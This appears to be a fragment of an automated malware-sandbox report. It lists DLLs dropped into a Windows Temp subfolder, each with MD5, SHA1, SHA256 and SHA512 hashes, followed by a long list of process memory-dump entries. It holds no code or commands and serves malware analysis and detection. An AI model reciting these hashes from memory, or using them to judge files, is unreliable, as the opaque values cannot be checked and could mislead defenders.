35c90cc3da07fbbba8b55ad6a79405ed

SHA1
21122db4016d33f6e1694a51081c0caabdbf763c

SHA256
049e1d76221fe5bd082adc3c4ebc4928015b1f67f0c55af81387fe63c14b3785

SHA512
b5553ff5f49a901a13a389f2f0cea4abbd2394314145badc7dcfd0c891e3e577f59f9dcdedf76fd8ec7d55ddcc90e5acc2faebaabe46edfa74de28c93da3235a

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.IO.FileSystem.dll

MD5
132ffe0260ed5657734b8a190731a960

SHA1
4a6fac0da2026e5a1b3182dc5e5775c8473bade1

SHA256
066d074ff4d3c165bdc11c975d7be8fba4eb93ecbaa71c6d8c92fb3ae4303832

SHA512
2a08e135afbf504a870ab12cc73c8df5ec923037039dc1b7b400951911080ba6b15c0279bbfe63cbbc9d9957c2db5eb58b0c963efb73f4c15de7e6c33863055f

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.Memory.dll

MD5
1d3dff4152753b20ea85f73b3056b755

SHA1
d9021e4aac563472e77495a7c8582a16a8515c4d

SHA256
4a4a06cf838a7fd1a7d5bdbb4e4fca3fb2c662f86f097344fb186e2946c26957

SHA512
91f5c6d358d2668ce3fbb1e9c1b15f6797d4f2299f2f5e6e1b153ec676be3d2afb5150030b9028267dac4305cf12822f211da328da6f40ef2fc3026599844ce9

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.Private.CoreLib.dll

MD5
0d4aaf9967d0a6629d12bd682b625976

SHA1
8fd7bbed141d016b516d4ca9781835b9cc983e5f

SHA256
3a406c14c2fb4a177b7d66a1cb5bfc1074e0e75391f60d17a1448e4a96df1f09

SHA512
04e22f3176cd0e14102a874d772e1740d9b613ba590ca5dec9b159a149884679665125552170c522b7ee7e72cfa8da9eb43636f2db3eff5c7704a63feee8747a

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.Runtime.Extensions.dll

MD5
5a768b9e7e8e5d645758f63da9c32148

SHA1
7aa4e1855ecb9b8ecf4580a67238ad5746db681a

SHA256
edde3968c8e77962a908eeafdeab38271c1099a629a602e10f66bb3c5dedf0df

SHA512
4e948554764d890bf3de1d1d81df44bf3e3e3ffad963c9765f7d8457dd4916e99fa77c757e89c080c001df835f97e1ce6fa5a4913312194eda5e78e36c29f858

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.Runtime.InteropServices.RuntimeInformation.dll

MD5
663f36cf216782f8dbc391c7dd1fa707

SHA1
1dbbe6fbe33e5ab518457c393ba2fbbc4fc38262

SHA256
e9df0cd6b6b11696765fed10051dc7f01910e6d8f5636f35c387e35c2d546955

SHA512
9bb4181dd94ee16d3bbf5a1975cba9698ed4e2e6497a5e7d4b515137774f9fd91eafc87e2a2045f27203af719617e64959f8443ca96d14cd458d2fa534d16083

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.Runtime.InteropServices.dll

MD5
c8d2ddcbbb03214080428453c0033f90

SHA1
724760ef474d24d04b85073cc971a065c1e2a201

SHA256
3f8dc93537c2cdb60517e16a402059027445f728ece35279f4a498a76eb71c5f

SHA512
8d2756f359f3d16b6fcf7e515d2a244a47edb24b709f59060537b0191d232c36bd11882a5228cf9f9614bba0e696d59cb2382a3fd71b6a2b2bf9abf6864ec3b9

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.Runtime.dll

MD5
45c2e97448e30e3b4b6f04852f15bb61

SHA1
0680bac452965edd3c26b293026140a4386ec290

SHA256
37a6694a39894d2f5bef6d0c3682e3a12f8d6a2c52715d5bacc69c1b2462b8f9

SHA512
515506345705546288d5574354d38394628bdd80dbc2ff9a6c547bc0f36d3b1a894294fc26a6eb0d1af23ffff0bc25330f6fcc4619d09fad8753660d260cc525

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System.Threading.dll

MD5
194f25b3a6ed1640bdfb82b0c0507c84

SHA1
8c60ce3eeefefd8cecb45ffa5225c429182a3cfb

SHA256
2df70c63f02e0d551928a14b5b6b9bbc119789bca09cba2a57cc16e64c570add

SHA512
50c89d04f4f117f96325b68a7c529a34fc05a61fd8b214fba9ece21be0288681efdf005c3e500f06d6bd77b11b67fd6db883fc86c959c932c716bc50c1b99c26

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System32.dll

MD5
60c41cf75f7918f34f27cd3ae8f40441

SHA1
3c5b4b5c062ec66e5459172ba4b94ea0a42e3d88

SHA256
c1d463c408c193c66fe5fb8178af0b11690f505d2f6e1be4f5a983e2c29f3d59

SHA512
054065ab7a90e51ab5cf4de21e326643157ab02110be9389dd83b61e1b7a8500fce8e963356dcf50f70f72e4f2162754ffc28b8f095b5dccf2ceefcfc4e3ad0d

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\System32.dll

MD5
60c41cf75f7918f34f27cd3ae8f40441

SHA1
3c5b4b5c062ec66e5459172ba4b94ea0a42e3d88

SHA256
c1d463c408c193c66fe5fb8178af0b11690f505d2f6e1be4f5a983e2c29f3d59

SHA512
054065ab7a90e51ab5cf4de21e326643157ab02110be9389dd83b61e1b7a8500fce8e963356dcf50f70f72e4f2162754ffc28b8f095b5dccf2ceefcfc4e3ad0d

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\clrjit.dll

MD5
12b16df135713d81647d8d6179a6fce8

SHA1
9ced449cb5ebb9252f1e6da1bbdda767bcfbe063

SHA256
3866b648094e878520f03500c02b7574b509c510ea76f844d6f03b8445037bd9

SHA512
af18a769042e00f40766744e969cbe4a83354213eb54fbf154ebc86242ee5aa4117bf2a964d5baec47b524a99a12c55aad62d87f06462005596d69a9844644c3

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\coreclr.dll

MD5
cc7f03a9bbfc589d59897259388173bc

SHA1
85c0955133b559b8fb2bcd75304caf63163814f9

SHA256
2f19c136fd01501d0b5057332e3bb153e103db4d13cc91da975d823106bf8be1

SHA512
de84cf5b8ac3253900f55fa651c77fd93c0522f4eb87c02f98e86720846e9fe4bd3900b49989aa2903fe0c7bfffb59b2a7f2e0e756a602fa03eeb10827480c91

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\hostfxr.dll

MD5
b794b8a9a8767315078586d415a0e29c

SHA1
8a1a377c3f84b3c93542dd7c45fd8f799a5d9247

SHA256
7f740ed62d68e54f99abf6fb7afb75ed77ca872e5995d12a47ccbd7fb7ae3324

SHA512
389dae5995f046181ef9f10bc14de449c4c2904a9bf49595d4e1f5be080baa75e5c3a35c62d2879e25fa155154316e1283f44bb2009de3433a1a50e8789ed241

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\hostpolicy.dll

MD5
4082b9e20def7e285474533095395064

SHA1
ce54abac401e6f41e2b231f798022549bc81611a

SHA256
e4c2bcda76a9647ee536e1e85bb0c50ff1aa19fe0f07fb559c3d4c0ddb6036f4

SHA512
ffbe8c30137de674f82a6765adf9678f2274b03301c2ee22744efc091bbe07e01e8ffc7c754b210922968e9fc3a2e31bffe98d979830f6c3d1219b7ea07a92ee

Download Submit
\Windows\Temp\.net\taskwinuee\sdzusl5w.y11\netstandard.dll

MD5
3f60144be2ab788e416c4155a23b23c1

SHA1
d7881d4b7c7412f2c69528be08286540ffc97524

SHA256
a35298cabb845f304f9cfc2c44cc73528b3051341d2b01f7379be2bd7277753c

SHA512
f8a36f0a846a601bcbef6684a2fa6a32d3c8978f24e662231da806ac0d2bd08a35a15d7dc76531bffed50c8b05451522012f2f3c072217d1d87f77934a356d87

Download Submit
memory/608-216-0x0000000000000000-mapping.dmp

Download
memory/612-182-0x0000000000000000-mapping.dmp

Download
memory/612-135-0x0000000000000000-mapping.dmp

Download
memory/700-219-0x0000000000000000-mapping.dmp

Download
memory/704-198-0x0000000000000000-mapping.dmp

Download
memory/712-136-0x0000000000000000-mapping.dmp

Download
memory/844-221-0x0000000000000000-mapping.dmp

Download
memory/884-217-0x0000000000000000-mapping.dmp

Download
memory/1048-183-0x0000000000000000-mapping.dmp

Download
memory/1052-230-0x0000000000000000-mapping.dmp

Download
memory/1148-180-0x0000000000000000-mapping.dmp

Download
memory/1152-220-0x0000000000000000-mapping.dmp

Download
memory/1244-119-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

Filesize
4KB

Download
memory/1244-116-0x0000000000000000-mapping.dmp

Download
memory/1292-215-0x0000000000000000-mapping.dmp

Download
memory/1304-178-0x0000000000000000-mapping.dmp

Download
memory/1316-218-0x0000000000000000-mapping.dmp

Download
memory/1320-194-0x0000000000000000-mapping.dmp

Download
memory/1340-222-0x0000000000000000-mapping.dmp

Download
memory/1368-231-0x0000000000000000-mapping.dmp

Download
memory/1452-195-0x0000000000000000-mapping.dmp

Download
memory/1456-134-0x0000000000000000-mapping.dmp

Download
memory/1520-199-0x0000000000000000-mapping.dmp

Download
memory/1556-151-0x0000000000000000-mapping.dmp

Download
memory/1560-188-0x0000000000000000-mapping.dmp

Download
memory/1700-228-0x0000000000000000-mapping.dmp

Download
memory/1844-196-0x0000000000000000-mapping.dmp

Download
memory/1912-164-0x0000000000000000-mapping.dmp

Download
memory/2020-213-0x0000000000000000-mapping.dmp

Download
memory/2072-192-0x0000000000000000-mapping.dmp

Download
memory/2108-187-0x0000000000000000-mapping.dmp

Download
memory/2132-153-0x0000000000000000-mapping.dmp

Download
memory/2212-140-0x0000000000000000-mapping.dmp

Download
memory/2292-202-0x0000000000000000-mapping.dmp

Download
memory/2320-191-0x0000000000000000-mapping.dmp

Download
memory/2340-143-0x0000000000000000-mapping.dmp

Download
memory/2380-229-0x0000000000000000-mapping.dmp

Download
memory/2380-144-0x0000000000000000-mapping.dmp

Download
memory/2420-139-0x0000000000000000-mapping.dmp

Download
memory/2432-205-0x0000000000000000-mapping.dmp

Download
memory/2432-157-0x0000000000000000-mapping.dmp

Download
memory/2508-171-0x0000000000000000-mapping.dmp

Download
memory/2512-115-0x00000000038A0000-0x00000000038A1000-memory.dmp

Filesize
4KB

Download
memory/2520-156-0x0000000000000000-mapping.dmp

Download
memory/2548-141-0x0000000000000000-mapping.dmp

Download
memory/2584-170-0x0000000000000000-mapping.dmp

Download
memory/2620-212-0x0000000000000000-mapping.dmp

Download
memory/2824-132-0x0000000000000000-mapping.dmp

Download
memory/2836-177-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/2836-173-0x0000000000000000-mapping.dmp

Download
memory/2916-204-0x0000000000000000-mapping.dmp

Download
memory/2960-142-0x0000000000000000-mapping.dmp

Download
memory/2960-227-0x0000000000000000-mapping.dmp

Download
memory/3008-207-0x0000000000000000-mapping.dmp

Download
memory/3048-159-0x0000000000000000-mapping.dmp

Download
memory/3172-166-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/3172-162-0x0000000000000000-mapping.dmp

Download
memory/3172-189-0x000000001C1D0000-0x000000001C1D2000-memory.dmp

Filesize
8KB

Download
memory/3212-210-0x0000000000000000-mapping.dmp

Download
memory/3392-716-0x0000000005EF1000-0x0000000005EF7000-memory.dmp

Filesize
24KB

Download
memory/3392-208-0x0000000005EE8000-0x0000000005EE9000-memory.dmp

Filesize
4KB

Download
memory/3392-2002-0x0000000005EE5000-0x0000000005EEE000-memory.dmp

Filesize
36KB

Download
memory/3392-2001-0x0000000005EE5000-0x0000000005EE6000-memory.dmp

Filesize
4KB

Download
memory/3392-1856-0x0000000005EF1000-0x0000000005EF7000-memory.dmp

Filesize
24KB

Download
memory/3392-1642-0x0000000005EE5000-0x0000000005EE6000-memory.dmp

Filesize
4KB

Download
memory/3392-127-0x0000000009D60000-0x0000000009D61000-memory.dmp

Filesize
4KB

Download
memory/3392-1643-0x0000000005EE5000-0x0000000005EEE000-memory.dmp

Filesize
36KB

Download
memory/3392-190-0x0000000005EE7000-0x0000000005EE8000-memory.dmp

Filesize
4KB

Download
memory/3392-238-0x0000000005EF0000-0x0000000005EF4000-memory.dmp

Filesize
16KB

Download
memory/3392-1489-0x0000000005EF1000-0x0000000005EF7000-memory.dmp

Filesize
24KB

Download
memory/3392-126-0x0000000009370000-0x0000000009D5E000-memory.dmp

Filesize
9.9MB

Download
memory/3392-169-0x0000000005EE6000-0x0000000005EE7000-memory.dmp

Filesize
4KB

Download
memory/3392-168-0x0000000005EE5000-0x0000000005EE6000-memory.dmp

Filesize
4KB

Download
memory/3392-1406-0x0000000005EFC000-0x0000000005EFE000-memory.dmp

Filesize
8KB

Download
memory/3392-1271-0x0000000005EE5000-0x0000000005EEE000-memory.dmp

Filesize
36KB

Download
memory/3392-1270-0x0000000005EE5000-0x0000000005EE6000-memory.dmp

Filesize
4KB

Download
memory/3392-145-0x0000000006D90000-0x0000000006DB6000-memory.dmp

Filesize
152KB

Download
memory/3392-137-0x0000000005EE2000-0x0000000005EE4000-memory.dmp

Filesize
8KB

Download
memory/3392-138-0x0000000005EE4000-0x0000000005EE5000-memory.dmp

Filesize
4KB

Download
memory/3392-128-0x000000000C790000-0x000000000C791000-memory.dmp

Filesize
4KB

Download
memory/3392-131-0x000000000C3F0000-0x000000000C3F1000-memory.dmp

Filesize
4KB

Download
memory/3392-130-0x0000000005E60000-0x0000000005E61000-memory.dmp

Filesize
4KB

Download
memory/3392-129-0x000000000C290000-0x000000000C291000-memory.dmp

Filesize
4KB

Download
memory/3392-133-0x0000000005EE1000-0x0000000005EE2000-memory.dmp

Filesize
4KB

Download
memory/3392-225-0x0000000005EE9000-0x0000000005EEF000-memory.dmp

Filesize
24KB

Download
memory/3392-1125-0x0000000005EF1000-0x0000000005EF7000-memory.dmp

Filesize
24KB

Download
memory/3392-125-0x0000000005EE0000-0x0000000005EE1000-memory.dmp

Filesize
4KB

Download
memory/3392-123-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/3392-120-0x0000000000000000-mapping.dmp

Download
memory/3392-996-0x0000000005EFC000-0x0000000005EFE000-memory.dmp

Filesize
8KB

Download
memory/3392-865-0x0000000005EE5000-0x0000000005EE9000-memory.dmp

Filesize
16KB

Download
memory/3392-452-0x0000000005EF4000-0x0000000005EF7000-memory.dmp

Filesize
12KB

Download
memory/3392-501-0x0000000005EF7000-0x0000000005EFA000-memory.dmp

Filesize
12KB

Download
memory/3392-536-0x0000000005EFA000-0x0000000005EFF000-memory.dmp

Filesize
20KB

Download
memory/3392-635-0x0000000005EFC000-0x0000000005EFE000-memory.dmp

Filesize
8KB

Download
memory/3548-160-0x0000000000000000-mapping.dmp

Download
memory/3612-161-0x0000000000000000-mapping.dmp

Download
memory/3648-223-0x0000000000000000-mapping.dmp

Download
memory/3804-209-0x0000000000000000-mapping.dmp

Download
memory/3952-152-0x0000000000000000-mapping.dmp

Download
memory/3952-201-0x0000000000000000-mapping.dmp

Download
memory/3976-185-0x0000000000000000-mapping.dmp

Download
memory/3976-224-0x0000000000000000-mapping.dmp

Download
memory/3984-275-0x0000000002F20000-0x0000000002F21000-memory.dmp

Filesize
4KB

Download
memory/3984-243-0x0000000002F20000-0x0000000002F21000-memory.dmp

Filesize
4KB

Download
memory/3984-242-0x0000000002F20000-0x0000000002F21000-memory.dmp

Filesize
4KB

Download
memory/3984-279-0x00000000083A0000-0x00000000083A1000-memory.dmp

Filesize
4KB

Download
memory/3984-226-0x0000000000000000-mapping.dmp

Download